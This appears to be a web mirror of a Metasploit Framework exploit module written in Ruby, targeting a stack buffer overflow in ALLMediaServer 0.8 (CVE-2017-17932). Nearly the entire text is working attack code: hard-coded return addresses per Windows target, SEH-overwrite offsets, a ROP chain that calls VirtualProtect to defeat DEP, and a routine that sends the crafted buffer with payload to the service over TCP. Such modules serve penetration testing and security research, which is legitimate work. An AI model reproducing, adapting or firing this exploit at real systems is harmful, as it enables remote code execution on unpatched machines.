Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/allmediaserver_bof.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'ALLMediaServer 0.8 Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability

19
          is caused due to a boundary error within the handling of HTTP request.

20


21
          While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't

22
          reliable across virtual (VMWare, VirtualBox) and physical environments. Because of

23
          this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default

24
          DEP is OptIn and AllMediaServer won't run with DEP.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'motaz reda <motazkhodair[at]gmail.com>',	# Original discovery

29
          'modpr0be <tom[at]spentera.com>',	# Metasploit module

30
          'juan vazquez' # More improvement

31
        ],

32
        'References' => [

33
          [ 'CVE', '2017-17932' ],

34
          [ 'OSVDB', '83889' ],

35
          [ 'EDB', '19625' ]

36
        ],

37
        'DefaultOptions' => {

38
          'EXITFUNC' => 'thread', # none/process/thread/seh

39
        },

40
        'Platform' => 'win',

41
        'Payload' => {

42
          'BadChars' => "",

43
          'Space' => 660,

44
          'DisableNops' => true

45
        },

46


47
        'Targets' => [

48
          [

49
            'ALLMediaServer 0.8 / Windows XP SP3 - English',

50
            {

51
              'Ret' =>	0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll

52
              'OffsetRop' =>	696,

53
              'jmp' =>	264,

54
              'Offset' =>	1072

55
            }

56
          ],

57
          [

58
            'ALLMediaServer 0.8 / Windows 7 SP1 - English',

59
            {

60
              'Ret' =>	0x6ac5cc92, # ppr from avformat-53.dll

61
              'Offset' =>	1072

62
            }

63
          ],

64
        ],

65
        'Privileged' => false,

66
        'DisclosureDate' => '2012-07-04',

67
        'DefaultTarget' => 1,

68
        'Notes' => {

69
          'Reliability' => UNKNOWN_RELIABILITY,

70
          'Stability' => UNKNOWN_STABILITY,

71
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

72
        }

73
      )

74
    )

75


76
    register_options([Opt::RPORT(888)])

77
  end

78


79
  def junk(n = 1)

80
    return [rand_text_alpha(4).unpack("L")[0]] * n

81
  end

82


83
  def nops(rop = false, n = 1)

84
    return rop ? [0x665a0aa1] * n : [0x90909090] * n

85
  end

86


87
  def asm(code)

88
    Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string

89
  end

90


91
  def exploit

92
    # with help from mona :)

93
    rop = [

94
      nops(true, 12),  # ROP NOP

95
      0x65f6faa7,      # POP EAX # RETN

96
      0x671ee4e0,      # ptr to &VirtualProtect()

97
      0x6ac1ccb4,      # MOV EAX,DWORD PTR DS:[EAX] # RETN

98
      0x667ceedf,      # PUSH EAX # POP ESI # POP EDI # RETN

99
      junk,

100
      0x65f5f09d,      # POP EBP # RETN

101
      0x65f9830d,      # & call esp

102
      0x6ac1c1d5,      # POP EBX # RETN

103
      0x00000600,      # 0x00000320-> ebx

104
      0x6672a1e2,      # POP EDX # RETN

105
      0x00000040,      # 0x00000040-> edx

106
      0x665a09df,      # POP ECX # RETN

107
      0x6ad58a3d,      # &Writable location

108
      0x6ac7a771,      # POP EDI # RETN

109
      nops(true),      # RETN (ROP NOP)

110
      0x6682f9f4,      # POP EAX # RETN

111
      nops,            # nop

112
      0x663dcbd2       # PUSHAD # RETN

113
    ].flatten.pack("V*")

114


115
    connect

116


117
    if target.name =~ /Windows 7/

118
      buffer = rand_text(target['Offset'])

119
      buffer << generate_seh_record(target.ret)

120
      buffer << payload.encoded

121
    else

122
      buffer = rand_text(target['OffsetRop'])	# junk

123
      buffer << rop

124
      buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload

125
      buffer << rand_text(target['Offset'] - buffer.length)

126
      buffer << generate_seh_record(target.ret)

127
      buffer << payload.encoded

128
    end

129


130
    print_status("Sending payload to ALLMediaServer on #{target.name}...")

131
    sock.put(buffer)

132


133
    disconnect

134
  end

135
end

136


137